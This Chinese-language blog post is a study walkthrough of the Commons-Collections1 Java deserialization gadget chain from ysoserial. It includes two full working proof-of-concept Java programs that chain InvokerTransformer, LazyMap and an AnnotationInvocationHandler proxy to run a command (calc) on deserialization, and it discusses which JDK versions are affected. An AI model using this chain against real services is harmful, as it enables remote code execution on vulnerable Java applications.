浅谈 yso的 Commons-Collections1 (cc1)反序列化链 如何手写这条链子

最新推荐文章于 2024-03-11 23:54:20 发布
最新推荐文章于 2024-03-11 23:54:20 发布
阅读量2.4k 收藏
点赞数
文章标签: web安全 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51458899/article/details/124100440
版权

yso的cc1

ysoserial/src/main/java/ysoserial/payloads at master · frohoff/ysoserial (github.com)

这里面找

poc

package org.apache.commons.collections;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;
import org.apache.commons.collections.map.TransformedMap;

import java.io.*;
import java.lang.annotation.Target;
import java.lang.reflect.*;
import java.util.HashMap;
import java.util.Map;

public class ccone {
    public  static  void  serialize(Object obj) throws IOException {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        oos.writeObject(obj);
    }

    public  static  Object  unserialize(String Filename) throws IOException, ClassNotFoundException {
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
        Object obj = ois.readObject();
        return obj;
    }

    public static void main(String[] args) throws InvocationTargetException, IllegalAccessException, NoSuchMethodException, ClassNotFoundException, InstantiationException, IOException {


        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class,Class[].class }, new Object[]{"getRuntime" , null}),
                new InvokerTransformer("invoke" , new Class[]{Object.class, Object[].class} , new Object[]{null, null}),
                new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})
        };

        ChainedTransformer chainedTransformer = new  ChainedTransformer(transformers);

        HashMap<Object,Object> map = new HashMap<>();
        Map<Object,Object> lazyMap =  LazyMap.decorate(map, chainedTransformer);

        Class c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor annotationInvocationHandlerConstruct = c.getDeclaredConstructor(Class.class, Map.class);
        annotationInvocationHandlerConstruct.setAccessible(true);
        InvocationHandler h = (InvocationHandler) annotationInvocationHandlerConstruct.newInstance(Override.class, lazyMap);

        Map proxy = (Map) Proxy.newProxyInstance(LazyMap.class.getClassLoader(), new Class[]{Map.class}, h);

        annotationInvocationHandlerConstruct.setAccessible(true);
        Object o = annotationInvocationHandlerConstruct.newInstance(Override.class, proxy);



        serialize(o);
        unserialize("ser.bin");



    }
}

image-20220410110838946

调试一下发现用到了lazymap,这个在前面找transform的时候又看见过

image-20220410111710338

在这个lazymap中找到了transform

image-20220410111859580

在一个get方法里面

image-20220410112029946

如果整条链子去分析的话,可以得到这样的流程

image-20220410114159293

如何手写呢?

简单分析

image-20220410143648525

上面是cc1

下面是cc6

poc

package org.apache.commons.collections;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;
import org.apache.commons.collections.map.TransformedMap;

import java.io.*;
import java.lang.annotation.Target;
import java.lang.reflect.*;
import java.util.HashMap;
import java.util.Map;

public class ccone {
    public  static  void  serialize(Object obj) throws IOException {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        oos.writeObject(obj);
    }

    public  static  Object  unserialize(String Filename) throws IOException, ClassNotFoundException {
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
        Object obj = ois.readObject();
        return obj;
    }

    public static void main(String[] args) throws InvocationTargetException, IllegalAccessException, NoSuchMethodException, ClassNotFoundException, InstantiationException, IOException {


        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class,Class[].class }, new Object[]{"getRuntime" , null}),
                new InvokerTransformer("invoke" , new Class[]{Object.class, Object[].class} , new Object[]{null, null}),
                new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})
        };

        ChainedTransformer chainedTransformer = new  ChainedTransformer(transformers);

        HashMap<Object,Object> map = new HashMap<>();
        map.put("value", "aaa");
        Map<Object,Object> lazyMap =  LazyMap.decorate(map,chainedTransformer);

        Class c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor annotationInvocationHandlerConstruct = c.getDeclaredConstructor(Class.class, Map.class);
        annotationInvocationHandlerConstruct.setAccessible(true);
        InvocationHandler h = (InvocationHandler) annotationInvocationHandlerConstruct.newInstance(Override.class, lazyMap);

        Map mapProxy = (Map) Proxy.newProxyInstance(LazyMap.class.getClassLoader(), new Class[]{Map.class}, h);

        Object o = annotationInvocationHandlerConstruct.newInstance(Override.class, mapProxy);
        serialize(o);
        unserialize("ser.bin");
    }
}

image-20220410141113477

Map mapProxy = (Map) Proxy.newProxyInstance(LazyMap.class.getClassLoader(), new Class[]{Map.class}, h);

里面动态代理这个地方也可以序列化,因为有实现序列化的接口,事实上所有代理都是继承自Proxy,都可以序列化,由于它序列化的和别人不太一样,这里就不展开了

image-20220410141514429

版本问题

之前cc1提到过:

重新下了个jdk8u65后接着奏乐接着舞

按照视频所说,应该可以返回去找到AnnotationInvocationHandler.readObject,很可惜我找不到,所以只能先写demo然后进去调试

最后调试的时候可以看到:

image-20220410142017030

AnnotationInvocationHandler.readObject确实调用了setValue

如果换作高版本jdk(jdk11)

image-20220410143340427

会发现在AnnotationInvocationHandler确实找不到setValue,这其实是官方的一个修复,在jdk8u7几就修复了

ththaiai
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ysoserial Java序列漏洞利用实践
悦分享
08-04 3329
ysoserial这款工具,堪称为“java序列利用神器”。
ysomap:一个基于ysererial的有用的Java序列利用框架
05-14
YSOMAP Ysomap is A helpful Java Deserialization exploit framework based on ysoserial #1 起因 在实际分析ysoserial的利用链时,有时候会觉得框架的太死,有以下几个缺点: 同一个利用链如果想改变一下最后的利用效果,如命令执行改成代码执行,我们需要改这个利用链或者是重新增加一个利用链。这时,我们其实可以看到利用链的前半部分是不变的,变的只是后续的利用效果。 ysoserial仅实现了常规的序列利用链,对于类似JSON格式的序列利用链,以当前的这个框架扩展起来会比较麻烦 所以萌生了开发一个更加灵活的框架来扩展序列利用链,也就是当前这个试验品ysomap。 PS:YSOMAP项目为另一个项目的子项目,后续将开源该项目,敬请期待...... #2 原理 我将利用链切分成了两个部分payload和
java序列理解_对ysoserial工具及java序列的一个阶段性理解
weixin_39615808的博客
02-24 287
经过一段时间的琢磨与思,以及重读了大量之前看不懂的序列文章,目前为止算是对java序列这块有了一个阶段性的小理解。目前为止,发送的所有java序列的漏洞中。主要需要两个触发条件:1、序列的攻击入口2、序列的pop攻击链这两个条件缺一不可。网上大量分析gadgets的文章方法,让人误以为有攻击链就可以序列。其实这块是有一定的误导性的。在我最初研究序列的时候,我觉得攻击链...
ysoserial序列工具打包jar文件流程
qq_53409748的博客
03-30 923
ysosserial是在常见的java库中发现的实用程序和面向属性的编程“小工具链”的集合,在适当的条件下,这些库可以利用java应用程序执行不安全的对象序列。主驱动程序接受用户指定的命令,并将其封装在用户指定的小工具链中,然后将这些对象序列到stdout。当类路径上具有所需小工具的应用程序不安全地序列这些数据时,链将被自动调用,并导致在应用程序主机上执行命令。
Commons-Collections1序列
m0_62770485的博客
12-05 678
JAVA安全-Commons-Collections1序列
commons-collections4-4.1-API文档-中文版.zip
07-03
赠送jar包:commons-collections4-4.1.jar; 赠送原API文档:commons-collections4-4.1-javadoc.jar; 赠送源代码:commons-collections4-4.1-sources.jar; 赠送Maven依赖信息文件:commons-collections4-4.1.pom;...
commons-collections-3.2.2-API文档-中文版.zip
05-01
赠送jar包:commons-collections-3.2.2.jar; 赠送原API文档:commons-collections-3.2.2-javadoc.jar; 赠送源代码:commons-collections-3.2.2-sources.jar; 赠送Maven依赖信息文件:commons-collections-3.2.2....
commons-collections-3.2.2-API文档-中英对照版.zip
04-20
赠送jar包:commons-collections-3.2.2.jar; 赠送原API文档:commons-collections-3.2.2-javadoc.jar; 赠送源代码:commons-collections-3.2.2-sources.jar; 赠送Maven依赖信息文件:commons-collections-3.2.2....
commons-collections4-4.4-API文档-中英对照版.zip
05-04
赠送jar包:commons-collections4-4.4.jar; 赠送原API文档:commons-collections4-4.4-javadoc.jar; 赠送源代码:commons-collections4-4.4-sources.jar; 赠送Maven依赖信息文件:commons-collections4-4.4.pom;...
commons-collections4-4.4-API文档-中文版.zip
05-09
赠送jar包:commons-collections4-4.4.jar; 赠送原API文档:commons-collections4-4.4-javadoc.jar; 赠送源代码:commons-collections4-4.4-sources.jar; 赠送Maven依赖信息文件:commons-collections4-4.4.pom;...
ysoserial序列工具包
04-19
ysoserial序列工具包,个人觉得还是很好利用 Java rmi 基本还很顺
JavaSec 基础之 CC1 链
最新发布
akdelt的博客
03-11 432
调用了 checkSetValue。而且它是 TransformedMap 的父类。
IDEA 调试 Maven 项目,为分析 CC1 做准备
Love&Share
01-14 1268
IDEA调试 高版本的 jdk 会修复一些漏洞,所以要分析漏洞需要用到多个版本的 jdk ,在分析漏洞之前首先了解 windows 安装多 jdk 环境 在官网可以下载历史版本的 jdk 安装包,地址,下载之后双击安装即可,为了管理方便可以把它们安装在同一个目录下 在 CC1 链中使用 8u65 就好,下面新建项目并配置 jdk 替换源码 因为 Java 中有一部分代码在 idea 中是通过编译看到的,不太好看,可以使用开源代码替换 下载链接:https://www.aliyundrive.com/s.
关于cc1/cc3 无法在高版本jdk中利用的说明
weixin_43263451的博客
07-26 506
在jdk8u71之后,调试invoke方法发现我们代理类AnnotationInvocationHandler中的this.memberValues被替换为了linkedhashmap,不是先前设置的lazymap,这就导致无法在78行调用lazymap.get。cc1和cc3本来是执行到readobject时利用动态代理触发代理类AnnotationInvocationHandler的invoke方法,从而调用AnnotationInvocationHandler中的lazymap.get方法。...
cc1链(LazyMap)
qq_45766062的博客
08-19 317
代码】cc1链(LazyMap)
Javaweb安全——序列漏洞- CC1链
weixin_43610673的博客
05-24 1191
Common-Collections利用链1 第一次接触序列漏洞时的初识Java序列漏洞这篇文章当中已经分析过一遍Common-Collections的两条链子(分别用的TransformedMap和LazyMap构造恶意对象射链,AnnotationInvocationHandler(CC1)和BadAttributeValueExpException(CC5)调用transform())。这次从Common-Collections1开始再捋一遍,顺便自己一遍exp加深印象。 本文环境为jd
java代码审计之CC1链(一)
st3pby的博客
02-20 3779
InvokerTransformerCC1链的漏洞点位于InvokerTransformer.class中射加载参数可控那么只需要调用到这个点,就可以触发漏洞,可以参考ysoserial中的CC1利用ysoserial中的CC1链,是使用LazyMap构造的,LazyMap构造的整条攻击路径为。
CC1(LazyMap版)
..
10-14 625
前面我们介绍了TransformedMap版的CC1链, 但是在ysoserial中用的是LazyMap,其实都差不多,下面开始分析一下,下面重在分析,如何找的就不说了(也不会)。如果文章有错误,欢迎斧正。
一文回顾攻击Java RMI方式
zybb166的博客
01-10 733
前序 RMI存在着三个主体 RMI Registry RMI Client RMI Server 而对于这三个主体其实都可以攻击,当然了需要根据jdk版本以及环境寻找对应的利用方式。 Ps.在最初接触的RMI洞是拿着工具一把梭,因此在以前看来笔者以为RMI是一个服务,暴露出端口后就可以随意攻击,现在看来是我才疏学了,对于RMI的理解过于片面了。本文是笔者在学习RMI的各种攻击方式后的小结,若有错误,请指出。 Ps1.本文并无任何新知识点,仅仅是对于各位师傅文章的一个小总结。 RMI为何 关
依赖项 maven:commons-collections:commons-collections:3.2.2 易受攻击
12-27
依赖项 maven:commons-collections:commons-collections:3.2.2 存在安全漏洞,易受到攻击。这个漏洞可能会被恶意攻击者利用来执行远程代码,造成严重的安全问题。因此,建议及时更新为最新版本或者采取其他安全措施来防止潜在的攻击。 针对这种情况,可以通过以下方式来解决问题: 1. 更新依赖项:查看最新的commons-collections版本,替换当前依赖项中的3.2.2版本,确保安装了最新的补丁以修复潜在的安全问题。 2. 检查依赖项:审查项目中的其他依赖项,确保没有其他存在安全漏洞的组件。 3. 监控漏洞公告:定期关注公告和安全通知,及时了解相关漏洞和补丁的信息,并在发现安全问题时及时采取措施加以修复。 为了保护系统和数据安全,事先预防是非常重要的。及时更新依赖项并加强安全意识教育,可以有效降低系统受攻击的风险,避免造成不必要的损失。同时,建议开发团队加强安全意识,适时对系统进行安全评估和漏洞扫描,以保障系统的安全稳定。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值